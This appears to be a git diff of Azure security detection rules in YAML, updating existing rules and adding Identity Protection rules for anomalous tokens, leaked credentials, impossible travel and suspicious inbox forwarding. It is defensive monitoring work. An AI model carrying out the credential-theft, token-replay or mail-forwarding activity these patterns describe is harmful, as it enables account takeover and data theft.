a/src/main/resources/rules/azure/azure_conditional_access_failure.yml b/src/main/resources/rules/azure/azure_conditional_access_failure.yml index d0af28e9b..7836b8f1c 100644 --- a/src/main/resources/rules/azure/azure_conditional_access_failure.yml +++ b/src/main/resources/rules/azure/azure_conditional_access_failure.yml @@ -1,10 +1,16 @@ title: Sign-in Failure Due to Conditional Access Requirements Not Met id: b4a6d707-9430-4f5f-af68-0337f52d5c42 +status: test description: Define a baseline threshold for failed sign-ins due to Conditional Access failures -author: Yochana Henderson, '@Yochana-H' -date: 2022/06/01 references: - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/01 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1110 + - attack.t1078.004 logsource: product: azure service: signinlogs @@ -18,7 +24,3 @@ falsepositives: - Misconfigured Systems - Vulnerability Scanners level: high -status: experimental -tags: - - attack.credential_access - - attack.t1110 diff --git a/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml b/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml index e47111824..f9c8753ec 100644 --- a/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_container_registry_created_or_deleted.yml @@ -1,27 +1,28 @@ title: Azure Container Registry Created or Deleted id: 93e0ef48-37c8-49ed-a02c-038aab23628e +status: test description: Detects when a Container Registry is created or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE condition: selection -level: low -tags: - - attack.impact falsepositives: - - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml b/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml index 04c3ed96e..e7363dca4 100644 --- a/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml +++ b/src/main/resources/rules/azure/azure_creating_number_of_resources_detection.yml @@ -2,21 +2,22 @@ title: Number Of Resource Creation Or Deployment Activities id: d2d901db-7a75-45a1-bc39-0cbf00812192 status: test description: Number of VM creations or deployment activities occur in Azure via the azureactivity log. -author: sawwinnnaung references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Creating_Anomalous_Number_Of_Resources_detection.yaml + - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml +author: sawwinnnaung date: 2020/05/07 -modified: 2021/11/27 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - keywords: - - Microsoft.Compute/virtualMachines/write - - Microsoft.Resources/deployments/write - condition: keywords + keywords: + - Microsoft.Compute/virtualMachines/write + - Microsoft.Resources/deployments/write + condition: keywords falsepositives: - - Valid change + - Valid change level: medium -tags: - - attack.t1098 diff --git a/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml b/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml index 5fc10bc63..dd2365036 100644 --- a/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml +++ b/src/main/resources/rules/azure/azure_device_no_longer_managed_or_compliant.yml @@ -1,22 +1,23 @@ title: Azure Device No Longer Managed or Compliant id: 542b9912-c01f-4e3f-89a8-014c48cdca7d +status: test description: Identifies when a device in azure is no longer managed or compliant -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: - Device no longer compliant - Device no longer managed condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Administrator may have forgotten to review the device. + - Administrator may have forgotten to review the device. +level: medium diff --git a/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml index 9f18c1e9f..b05239e65 100644 --- a/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_device_or_configuration_modified_or_deleted.yml @@ -1,14 +1,19 @@ title: Azure Device or Configuration Modified or Deleted id: 46530378-f9db-4af9-a9e5-889c177d3881 +status: test description: Identifies when a device or device configuration in azure is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 + - attack.t1565.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: @@ -17,10 +22,8 @@ detection: - Update device - Update device configuration condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Device or device configuration being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Device or device configuration being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml index faa86c01e..5cf9825bb 100644 --- a/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_dns_zone_modified_or_deleted.yml @@ -1,24 +1,26 @@ title: Azure DNS Zone Modified or Deleted id: af6925b0-8826-47f1-9324-337507a0babd +status: test description: Identifies when DNS zone is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact + - attack.t1565.001 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message|startswith: MICROSOFT.NETWORK/DNSZONES - properties.message|endswith: - - /WRITE - - /DELETE + operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES' + operationName|endswith: + - '/WRITE' + - '/DELETE' condition: selection -level: medium -tags: - - attack.impact falsepositives: - - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_federation_modified.yml b/src/main/resources/rules/azure/azure_federation_modified.yml index 4512ee967..8ff1cf259 100644 --- a/src/main/resources/rules/azure/azure_federation_modified.yml +++ b/src/main/resources/rules/azure/azure_federation_modified.yml @@ -1,25 +1,25 @@ title: Azure Domain Federation Settings Modified id: 352a54e1-74ba-4929-9d47-8193d67aba1e +status: test description: Identifies when an user or application modified the federation settings on the domain. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes author: Austin Songer -status: experimental date: 2021/09/06 modified: 2022/06/08 -references: - - https://attack.mitre.org/techniques/T1078 - - https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes +tags: + - attack.initial_access + - attack.t1078 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: selection: ActivityDisplayName: Set federation settings on domain condition: selection -level: medium -tags: - - attack.initial_access - - attack.t1078 falsepositives: - - Federation Settings being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Federation Settings being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +level: medium diff --git a/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml index 28c659a05..6a9d98390 100644 --- a/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_firewall_modified_or_deleted.yml @@ -1,23 +1,26 @@ title: Azure Firewall Modified or Deleted id: 512cf937-ea9b-4332-939c-4c2c94baadcd +status: test description: Identifies when a firewall is created, modified, or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact + - attack.defense_evasion + - attack.t1562.004 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml index de1fc0c5d..d8aed4657 100644 --- a/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_firewall_rule_collection_modified_or_deleted.yml @@ -1,17 +1,22 @@ title: Azure Firewall Rule Collection Modified or Deleted id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 +status: test description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact + - attack.defense_evasion + - attack.t1562.004 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE @@ -19,9 +24,7 @@ detection: - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_granting_permission_detection.yml b/src/main/resources/rules/azure/azure_granting_permission_detection.yml index d1fb9dfd4..58cb33d52 100644 --- a/src/main/resources/rules/azure/azure_granting_permission_detection.yml +++ b/src/main/resources/rules/azure/azure_granting_permission_detection.yml @@ -2,20 +2,21 @@ title: Granting Of Permissions To An Account id: a622fcd2-4b5a-436a-b8a2-a4171161833c status: test description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. -author: sawwinnnaung references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/azureactivity/Granting_Permissions_To_Account_detection.yaml + - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml +author: sawwinnnaung date: 2020/05/07 -modified: 2021/11/27 +modified: 2023/10/11 +tags: + - attack.persistence + - attack.t1098.003 logsource: - product: azure - service: azureactivity + product: azure + service: activitylogs detection: - keywords: - - Microsoft.Authorization/roleAssignments/write - condition: keywords + keywords: + - Microsoft.Authorization/roleAssignments/write + condition: keywords falsepositives: - - Valid change + - Valid change level: medium -tags: - - attack.t1098 diff --git a/src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml b/src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml new file mode 100644 index 000000000..fcf939136 --- /dev/null +++ b/src/main/resources/rules/azure/azure_group_user_addition_ca_modification.yml @@ -0,0 +1,23 @@ +title: User Added To Group With CA Policy Modification Access +id: 91c95675-1f27-46d0-bead-d1ae96b97cd3 +status: test +description: Monitor and alert on group membership additions of groups that have CA policy modification access +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access +author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner' +date: 2022/08/04 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1548 + - attack.t1556 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add member from group + condition: selection +falsepositives: + - User removed from the group is approved +level: medium diff --git a/src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml b/src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml new file mode 100644 index 000000000..434085ec9 --- /dev/null +++ b/src/main/resources/rules/azure/azure_group_user_removal_ca_modification.yml @@ -0,0 +1,23 @@ +title: User Removed From Group With CA Policy Modification Access +id: 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c +status: test +description: Monitor and alert on group membership removal of groups that have CA policy modification access +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access +author: Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner' +date: 2022/08/04 +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1548 + - attack.t1556 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Remove member from group + condition: selection +falsepositives: + - User removed from the group is approved +level: medium diff --git a/src/main/resources/rules/azure/azure_guest_invite_failure.yml b/src/main/resources/rules/azure/azure_guest_invite_failure.yml new file mode 100644 index 000000000..5999f29f4 --- /dev/null +++ b/src/main/resources/rules/azure/azure_guest_invite_failure.yml @@ -0,0 +1,23 @@ +title: Guest User Invited By Non Approved Inviters +id: 0b4b72e3-4c53-4d5b-b198-2c58cfef39a9 +status: test +description: Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/10 +tags: + - attack.persistence + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Invite external user + Status: failure + condition: selection +falsepositives: + - A non malicious user is unaware of the proper process +level: medium diff --git a/src/main/resources/rules/azure/azure_guest_to_member.yml b/src/main/resources/rules/azure/azure_guest_to_member.yml new file mode 100644 index 000000000..e42458ac4 --- /dev/null +++ b/src/main/resources/rules/azure/azure_guest_to_member.yml @@ -0,0 +1,24 @@ +title: User State Changed From Guest To Member +id: 8dee7a0d-43fd-4b3c-8cd1-605e189d195e +status: test +description: Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins +author: MikeDuddington, '@dudders1' +date: 2022/06/30 +tags: + - attack.privilege_escalation + - attack.initial_access + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'UserManagement' + OperationName: 'Update user' + properties.message: '"displayName":"UserType","oldValue":"[\"Guest\"]","newValue":"[\"Member\"]"' + condition: selection +falsepositives: + - If this was approved by System Administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml b/src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml new file mode 100644 index 000000000..7e28e0337 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anomalous_token.yml @@ -0,0 +1,22 @@ +title: Anomalous Token +id: 6555754e-5e7f-4a67-ad1c-4041c413a007 +status: experimental +description: Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-token + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow' +date: 2023/08/07 +tags: + - attack.t1528 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'anomalousToken' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml b/src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml new file mode 100644 index 000000000..2ca44a9ef --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anomalous_user.yml @@ -0,0 +1,22 @@ +title: Anomalous User Activity +id: 258b6593-215d-4a26-a141-c8e31c1299a6 +status: experimental +description: Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1098 + - attack.persistence +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'anomalousUserActivity' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml new file mode 100644 index 000000000..28dc45303 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_activity.yml @@ -0,0 +1,25 @@ +title: Activity From Anonymous IP Address +id: be4d9c86-d702-4030-b52e-c7859110e5e8 +status: experimental +description: Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'riskyIPAddress' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml new file mode 100644 index 000000000..cecd0cb48 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_anonymous_ip_address.yml @@ -0,0 +1,22 @@ +title: Anonymous IP Address +id: 53acd925-2003-440d-a1f3-71a5253fe237 +status: experimental +description: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. +references: + - https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0 + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address +author: Gloria Lee, '@gleeiamglo' +date: 2023/08/22 +tags: + - attack.t1528 + - attack.credential_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'anonymizedIPAddress' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml b/src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml new file mode 100644 index 000000000..3c5738586 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_atypical_travel.yml @@ -0,0 +1,25 @@ +title: Atypical Travel +id: 1a41023f-1e70-4026-921a-4d9341a9038e +status: experimental +description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#atypical-travel + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'unlikelyTravel' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml b/src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml new file mode 100644 index 000000000..23899ccdb --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_impossible_travel.yml @@ -0,0 +1,25 @@ +title: Impossible Travel +id: b2572bf9-e20a-4594-b528-40bde666525a +status: experimental +description: Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1078 + - attack.persistence + - attack.defense_evasion + - attack.privilege_escalation + - attack.initial_access +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'impossibleTravel' + condition: selection +falsepositives: + - Connecting to a VPN, performing activity and then dropping and performing additional activity. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml b/src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml new file mode 100644 index 000000000..565003619 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_inbox_forwarding_rule.yml @@ -0,0 +1,22 @@ +title: Suspicious Inbox Forwarding Identity Protection +id: 27e4f1d6-ae72-4ea0-8a67-77a73a289c3d +status: experimental +description: Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-forwarding + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1140 + - attack.defense_evasion +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'suspiciousInboxForwarding' + condition: selection +falsepositives: + - A legitimate forwarding rule. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml b/src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml new file mode 100644 index 000000000..5bc55b667 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_inbox_manipulation.yml @@ -0,0 +1,22 @@ +title: Suspicious Inbox Manipulation Rules +id: ceb55fd0-726e-4656-bf4e-b585b7f7d572 +status: experimental +description: Detects suspicious rules that delete or move messages or folders are set on a user's inbox. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1140 + - attack.defense_evasion +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'mcasSuspiciousInboxManipulationRules' + condition: selection +falsepositives: + - Actual mailbox rules that are moving items based on their workflow. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml b/src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml new file mode 100644 index 000000000..17c116f1d --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_leaked_credentials.yml @@ -0,0 +1,22 @@ +title: Azure AD Account Credential Leaked +id: 19128e5e-4743-48dc-bd97-52e5775af817 +status: experimental +description: Indicates that the user's valid credentials have been leaked. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#leaked-credentials + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: + - attack.t1589 + - attack.reconnaissance +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'leakedCredentials' + condition: selection +falsepositives: + - A rare hash collision. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml new file mode 100644 index 000000000..11b942592 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address.yml @@ -0,0 +1,22 @@ +title: Malicious IP Address Sign-In Failure Rate +id: a3f55ebd-0c01-4ed6-adc0-8fb76d8cd3cd +status: experimental +description: Indicates sign-in from a malicious IP address based on high failure rates. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/07 +tags: + - attack.t1090 + - attack.command_and_control +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'maliciousIPAddress' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml new file mode 100644 index 000000000..961202f93 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_malicious_ip_address_suspicious.yml @@ -0,0 +1,22 @@ +title: Malicious IP Address Sign-In Suspicious +id: 36440e1c-5c22-467a-889b-593e66498472 +status: experimental +description: Indicates sign-in from a malicious IP address known to be malicious at time of sign-in. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malicious-ip-address + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/07 +tags: + - attack.t1090 + - attack.command_and_control +logsource: + product: azure + service: riskdetection +detection: + selection: + riskEventType: 'suspiciousIPAddress' + condition: selection +falsepositives: + - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user. +level: high diff --git a/src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml b/src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml new file mode 100644 index 000000000..7ed256421 --- /dev/null +++ b/src/main/resources/rules/azure/azure_identity_protection_malware_linked_ip.yml @@ -0,0 +1,22 @@ +title: Sign-In From Malware Infected IP +id: 821b4dc3-1295-41e7-b157-39ab212dd6bd +status: experimental +description: Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated + - https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/03 +tags: 